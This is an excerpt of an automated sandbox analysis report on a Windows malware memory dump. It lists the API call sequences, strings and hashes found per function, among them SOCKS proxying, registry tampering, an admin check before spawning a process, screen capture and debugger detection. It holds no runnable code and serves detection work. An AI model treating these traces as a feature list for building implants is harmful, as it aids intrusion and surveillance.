                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentThread_memcpy_s$htonsinet_ntop$ErrorLastgetaddrinfo
                                                                          • String ID: -$[-] SOCKS thread(%d) getAddressInfo DNS selected, length mismatch: %ld$uFSV$uFSV$uFSV$uFSV$uFSV$uFSV
                                                                          • API String ID: 1609131275-272974455
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 06B7CD2B
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 06B7CD7E
                                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000002,00000004), ref: 06B7CDAA
                                                                          • GetSystemWindowsDirectoryA.KERNEL32(?,00000200), ref: 06B7CE04
                                                                          • lstrcatA.KERNEL32(?,?,?,?,?), ref: 06B7CF17
                                                                          • IsUserAnAdmin.SHELL32 ref: 06B7CF88
                                                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 06B7D1CE
                                                                          • CloseHandle.KERNEL32(?), ref: 06B7D1F7
                                                                          • CloseHandle.KERNEL32(?), ref: 06B7D204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleValue$AdminCreateDirectoryOpenProcessQuerySystemUserWindowslstrcat
                                                                          • String ID: DhbZ$HjDBKYOik35wJkl$JVDo$Jfbx$Qhbx
                                                                          • API String ID: 829427948-3866227311
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 06B7B4E0
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 06B7B69B
                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 06B7B95D
                                                                          • FindClose.KERNEL32(000000FF), ref: 06B7B970
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 06B7B976
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseCreateDirectoryErrorFirstLastNext
                                                                          • String ID:
                                                                          • API String ID: 2993551283-0
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 06B834DB
                                                                          • __aulldiv.LIBCMT ref: 06B83765
                                                                          • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,00000000,00006C23,00000000), ref: 06B83A71
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B83A8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __aulldiv$AddressHandleModuleProc
                                                                          • String ID: Ws2_32.dll$y
                                                                          • API String ID: 3748425447-3152010109
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateLevelSafer
                                                                          • String ID:
                                                                          • API String ID: 3489925794-0
                                                                          APIs
                                                                            • Part of subcall function 06BC47E3: GetLastError.KERNEL32(00000000,06BBFE22,06BCA074), ref: 06BC47E7
                                                                            • Part of subcall function 06BC47E3: SetLastError.KERNEL32(00000000,00000000,00000000,0000000A,000000FF), ref: 06BC4889
                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 06BD0405
                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 06BD0443
                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 06BD0456
                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 06BD049E
                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 06BD04B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                          • String ID:
                                                                          • API String ID: 415426439-0
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06BAE679
                                                                          • IsDebuggerPresent.KERNEL32 ref: 06BAE758
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 06BAE7BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                          • String ID:
                                                                          • API String ID: 4268342597-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e790f21015fde6a360fa9c65d37563a32b2491bc2c272def746492e7f7d4516
                                                                          • Instruction ID: f70ad1e7a75e186143278f21c9d57a073794e67e0e60d53f189aa8a771e762e6
                                                                          • Opcode Fuzzy Hash: 7e790f21015fde6a360fa9c65d37563a32b2491bc2c272def746492e7f7d4516
                                                                          • Instruction Fuzzy Hash: 5EB1E0B4E006068BCBE4CF79C9849FEBBB1EF44280B44369DC092A7261D6F1E907CB51
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 1bfc71a8812cb45ed3e0ec899defa2699f6a5f264d20eedf17c9262408459790
                                                                          • Instruction ID: d69770bf89adbde926362f72d002d6877d9849f5fb2f5a24a1e4ea9dc61a5910
                                                                          • Opcode Fuzzy Hash: 1bfc71a8812cb45ed3e0ec899defa2699f6a5f264d20eedf17c9262408459790
                                                                          • Instruction Fuzzy Hash: 8EB106B59107058BDBB89F34CC91AB7B3EEEF04328F1484EDDA86C6590EA75A745CB10
                                                                          APIs
                                                                          • RoGetActivationFactory.API-MS-WIN-CORE-WINRT-L1-1-0(?,00000001,5B885FF7,5B885FF7,?,00000000,00000044,?,?,?,?,?,?,06BD7EE0,000000FF), ref: 06BB27CB
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00001000,?,00000001,5B885FF7,5B885FF7,?,00000000,00000044,?,?,?,?,?,?), ref: 06BB27E6
                                                                          • GetProcAddress.KERNEL32(00000000,CoIncrementMTAUsage), ref: 06BB27F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ActivationAddressFactoryLibraryLoadProc
                                                                          • String ID: CoIncrementMTAUsage$DllGetActivationFactory$combase.dll
                                                                          • API String ID: 935683589-2993125632
                                                                          • Opcode ID: 80fdd6f33f43bfee1e323c487da1e3e2acab18f849708c358ea0294d82fe7afb
                                                                          • Instruction ID: 7a6a2ec92f8824c03b45756f287d2493552f3bd0d57a699f1321a9ebbb2ea553
                                                                          • Opcode Fuzzy Hash: 80fdd6f33f43bfee1e323c487da1e3e2acab18f849708c358ea0294d82fe7afb
                                                                          • Instruction Fuzzy Hash: F2713EB1D00215ABDF95EFB4CC50BFDB7B8EF08310F0455A9E525A7290EBB0AA45CB60
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?), ref: 06B7F8DF
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B7F8F0
                                                                          • GetProcessHeap.KERNEL32 ref: 06B7F900
                                                                          • HeapAlloc.KERNEL32(00000000,00000000,?), ref: 06B7F926
                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 06B7F95A
                                                                          • HeapAlloc.KERNEL32(00000000,00000000,10000000), ref: 06B7F980
                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 06B7F99B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Heap$AllocFree$AddressHandleModuleProcProcess
                                                                          • String ID: C{iN$J'tq
                                                                          • API String ID: 685132064-1256937504
                                                                          • Opcode ID: 0141e7df317b0fa52aa68a1285a9ca3eb30ffbc12c7f12bdf2e0e853fc6d6060
                                                                          • Instruction ID: e964ceea3195c53c4f9aea191d283dab1f6b0a3016063d1866e24b2b92bb71f7
                                                                          • Opcode Fuzzy Hash: 0141e7df317b0fa52aa68a1285a9ca3eb30ffbc12c7f12bdf2e0e853fc6d6060
                                                                          • Instruction Fuzzy Hash: E3C1F2B4D04298DBDB26CFA8C841AEDFBB1BF58300F14829AD958BB355E7305A85CF51
                                                                          APIs
                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 06BB22F5
                                                                            • Part of subcall function 06BB33BA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 06BB33C6
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06BB2466
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentThreadXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                          • String ID: vector too long
                                                                          • API String ID: 3461298183-2873823879
                                                                          • Opcode ID: a0283aabdfa0898ea38706450a8f99c05f1f648b1769f324c664754d1f01aef3
                                                                          • Instruction ID: cd84cc6aaa4d8a44d0de86b61448c0456cdabbf637ae3298c3ee2dc693898290
                                                                          • Opcode Fuzzy Hash: a0283aabdfa0898ea38706450a8f99c05f1f648b1769f324c664754d1f01aef3
                                                                          • Instruction Fuzzy Hash: 0ED16FB19042089FDB64DF64CC80BEAB7B9FF49304F0455DDE55997290EBB09A84CFA1
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,0000001C,06BE102C), ref: 06B795F0
                                                                          • SetupDiEnumDeviceInfo.SETUPAPI(00000000,06B799F4,00000000), ref: 06B7960E
                                                                          • LocalAlloc.KERNEL32(00000040,0000001C), ref: 06B79649
                                                                          • SetupDiEnumDeviceInterfaces.SETUPAPI(00000000,00000000,06BD9500,06B799F4,00000000), ref: 06B7966E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocDeviceEnumLocalSetup$InfoInterfaces
                                                                          • String ID:
                                                                          • API String ID: 1562706109-0
                                                                          • Opcode ID: 8d0d208175f97551f587a140853e5e1914ba6bbf21bbab4820ad03f550df69be
                                                                          • Instruction ID: 6a41c8db7f520401cefb8782836657118ab59c38e7ccdf9741bd229d70d780e7
                                                                          • Opcode Fuzzy Hash: 8d0d208175f97551f587a140853e5e1914ba6bbf21bbab4820ad03f550df69be
                                                                          • Instruction Fuzzy Hash: 4B71FAB4E01209EFDF44DFA4D895BEEBBB5FF48710F108158E525AB290D734AA01CBA4
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 06BB96DF
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 06BB97ED
                                                                          • _UnwindNestedFrames.LIBCMT ref: 06BB993F
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 06BB995A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 2751267872-393685449
                                                                          • Opcode ID: 9e8ee87e9b01784ed93fe65e57ad9d2e09aa177c024dc14c367b9276e372794d
                                                                          • Instruction ID: af8ad50e3a4d52d72249215267f7e69ca6d14ff0c629c3045dc9fccb1d6594e4
                                                                          • Opcode Fuzzy Hash: 9e8ee87e9b01784ed93fe65e57ad9d2e09aa177c024dc14c367b9276e372794d
                                                                          • Instruction Fuzzy Hash: 67B15CB1C002099FCF95EFA4CC809FEBBB5FF06310B146599EA156B211D7B1DA51CB91
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(00000000), ref: 06B7D73C
                                                                          • GetSystemMetrics.USER32(00000001), ref: 06B7D74A
                                                                          • GetDC.USER32(00000000), ref: 06B7D758
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 06B7D76B
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 06B7D789
                                                                          • SelectObject.GDI32(?,?), ref: 06B7D7A3
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 06B7D7AF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CompatibleCreateMetricsSystem$BitmapObjectReleaseSelect
                                                                          • String ID:
                                                                          • API String ID: 1591331490-0
                                                                          • Opcode ID: 84c05e5f74b8cd0000be8a4c228650e04c30a5c3737341266acd144857eb977f
                                                                          • Instruction ID: 6ee970daed124e1f4a8185680f627a0297f347f608ec3375338ace08c2dadbad
                                                                          • Opcode Fuzzy Hash: 84c05e5f74b8cd0000be8a4c228650e04c30a5c3737341266acd144857eb977f
                                                                          • Instruction Fuzzy Hash: 1E4175B8A01208EFDB44DF94D594AADBBB5FF48304F208189E9059B381D771EE42DF90
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 06BB345B
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 06BB3465
                                                                          • int.LIBCPMTD ref: 06BB347C
                                                                            • Part of subcall function 06B729D0: std::_Lockit::_Lockit.LIBCPMT ref: 06B729E6
                                                                            • Part of subcall function 06B729D0: std::_Lockit::~_Lockit.LIBCPMT ref: 06B72A10
                                                                          • codecvt.LIBCPMT ref: 06BB349F
                                                                          • std::_Facet_Register.LIBCPMT ref: 06BB34B6
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 06BB34D6
                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 06BB34E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                          • String ID:
                                                                          • API String ID: 2133458128-0
                                                                          • Opcode ID: 34b229c1cbcf509339d8a4e67dd5310b7db1324554c1de01d7d2bcc58edb1823
                                                                          • Instruction ID: dbed319ab8fc6a2e549417808a65bebbfa141ff139c24b71626f584785b7f64e
                                                                          • Opcode Fuzzy Hash: 34b229c1cbcf509339d8a4e67dd5310b7db1324554c1de01d7d2bcc58edb1823
                                                                          • Instruction Fuzzy Hash: B11160F2A002149FCBD5BF74DC40AFEB7E5EB44220F145499D426AB381DFB1AA01CB91
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?), ref: 06B7D612
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B7D623
                                                                          • GetVersionExA.KERNEL32(06B9D388), ref: 06B7D645
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProcVersion
                                                                          • String ID: C}Fx$J'tq
                                                                          • API String ID: 3310240892-1733491810
                                                                          • Opcode ID: 710130bc8535aaccc587586eeb4d5ea5c4126a8404ce9b7cbf15d4c1c25fd326
                                                                          • Instruction ID: 8384ba4733d823c3986926123f12274b2782e49a87c328e4bc327c547506baec
                                                                          • Opcode Fuzzy Hash: 710130bc8535aaccc587586eeb4d5ea5c4126a8404ce9b7cbf15d4c1c25fd326
                                                                          • Instruction Fuzzy Hash: 9A712274D0929C9BDB16CFA8D8816DDFBB2BF59300F14829AD988B7306E7305A85CF51
                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5B885FF7,?,?,00000000,06BD80D2,000000FF,?,06BC36A4,?,?,06BC3678,00000000), ref: 06BC373F
                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 06BC3751
                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,06BD80D2,000000FF,?,06BC36A4,?,?,06BC3678,00000000), ref: 06BC3773
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 9c4ef9de4b0b68b47b8d043907e79f508b9dfdbd4bc9351612b3cc444d1e6112
                                                                          • Instruction ID: 2839f15ebfcdfc47f17f7b332da9ff6ff92cc945638ca665f26e022fa8a0b44e
                                                                          • Opcode Fuzzy Hash: 9c4ef9de4b0b68b47b8d043907e79f508b9dfdbd4bc9351612b3cc444d1e6112
                                                                          • Instruction Fuzzy Hash: 1901D6F1941619EFCB51AF54DC19FAEBBBDFB04B15F004169F911A7290EB749A00CB80
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 06BA12D7
                                                                          • int.LIBCPMTD ref: 06BA12F0
                                                                            • Part of subcall function 06B729D0: std::_Lockit::_Lockit.LIBCPMT ref: 06B729E6
                                                                            • Part of subcall function 06B729D0: std::_Lockit::~_Lockit.LIBCPMT ref: 06B72A10
                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 06BA1337
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 06BA13C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                          • String ID:
                                                                          • API String ID: 3053331623-0
                                                                          • Opcode ID: f2de501a148f462acb328999d8027ac823b5c798de02cbb7eff683125204aa71
                                                                          • Instruction ID: ba49987e6537867b734783f8a0f1eedead58c6b848476155f4f440c127904ab7
                                                                          • Opcode Fuzzy Hash: f2de501a148f462acb328999d8027ac823b5c798de02cbb7eff683125204aa71
                                                                          • Instruction Fuzzy Hash: 9A41D5B4D04209DFCB54DFA8D980AEEBBF5FF48310F108259E825A7390D7746A41CBA1
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 06BAD4B8
                                                                          • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 06BAD4C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                          • API String ID: 1646373207-919018592
                                                                          • Opcode ID: 67be9679453dda09d426622255dacfe00e25ea1df7110a44af5e5ac4d450f643
                                                                          • Instruction ID: 68b0750765f96477201ec9c03e8546db5769ef666a8e04f94129ff609a2c17a4
                                                                          • Opcode Fuzzy Hash: 67be9679453dda09d426622255dacfe00e25ea1df7110a44af5e5ac4d450f643
                                                                          • Instruction Fuzzy Hash: 62C080F51C430897954077E5780DE26375DA600A513504095F501C6400DB61D010C661
                                                                          APIs
                                                                          • CreateThread.KERNEL32(00000000,06B95AB0,06BBA5A3,00000000,00000004,00000000), ref: 06BBA750
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,06B9B23E,06B95AB0), ref: 06BBA75C
                                                                          • __dosmaperr.LIBCMT ref: 06BBA763
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• API String ID: 2744730728-0
• Opcode ID: 6f80c62b9d5cf543712ed468742f0ce8bed524c4ab7e76570580ca181fa068fd
• Instruction ID: d037b51f5def19597ece8f869f7023bbecfc4705adbc252fd33521b4a4ad04f6
• Opcode Fuzzy Hash: 6f80c62b9d5cf543712ed468742f0ce8bed524c4ab7e76570580ca181fa068fd
• Instruction Fuzzy Hash: 48018EB2D15214BBDB90AB69DC08BFEBA79DB81775F106295E524961D0DBF08500C760

Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36, xrefs: 06BA782C
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Similarity
• String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
• API String ID: 0-2732702261
• Opcode ID: 9af5e615ddefc920804e802832d9287a66891031fcda436be4b49d211ab02376
• Instruction ID: b990740f563b018f42bc5cc32949730c8a3a0a6e1fc066d4f0a4fa54749e1053
• Opcode Fuzzy Hash: 9af5e615ddefc920804e802832d9287a66891031fcda436be4b49d211ab02376
• Instruction Fuzzy Hash: 1051C2B5D04208AFDB48CFE9D894BEEBBB5EF48300F148169E519AB344DB746A41CF90

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 06B72789
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 06B72855
  • Part of subcall function 06BB490D: _Yarn.LIBCPMT ref: 06BB492C
  • Part of subcall function 06BB490D: _Yarn.LIBCPMT ref: 06BB4950
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Similarity
• API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name
• API String ID: 1908188788-1405518554
• Opcode ID: cb99a5dbf350849d538eb01f949ac426dce4524a143bc4f5f1c0be86f76d1e19
• Instruction ID: c99d4cdfe89cb16bf23be57ea3c79e4008cb1bb04ec8b1e3464718542456e329
• Opcode Fuzzy Hash: cb99a5dbf350849d538eb01f949ac426dce4524a143bc4f5f1c0be86f76d1e19
• Instruction Fuzzy Hash: A34103B4D05289DFDB05CFA8C950BAEFBF1BF09304F148299D415AB382C7759A40CBA5

APIs
• lstrlenA.KERNEL32(00000000), ref: 06BA7676
• GetProcessHeap.KERNEL32(00000008,-00000001), ref: 06BA7699
• HeapAlloc.KERNEL32(00000000), ref: 06BA76A0
• lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 06BA76B5
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Similarity
• API ID: Heap$AllocProcesslstrcpynlstrlen
• API String ID: 2211197272-0
• Opcode ID: 8cbc2e4ba37a73b1403a4760becd4208bfa6b20cb0a6b47454cd47895e1a1331
• Instruction ID: c4771fe5bcbda961ed5b8374e9bd1307d7bead1cbbdcb7197c0353154568b7ba
• Opcode Fuzzy Hash: 8cbc2e4ba37a73b1403a4760becd4208bfa6b20cb0a6b47454cd47895e1a1331
• Instruction Fuzzy Hash: E8314AF5D05308EFDB44CFA8D954BAEBBB6FB44304F1085A8E915AB380D774AA40CB44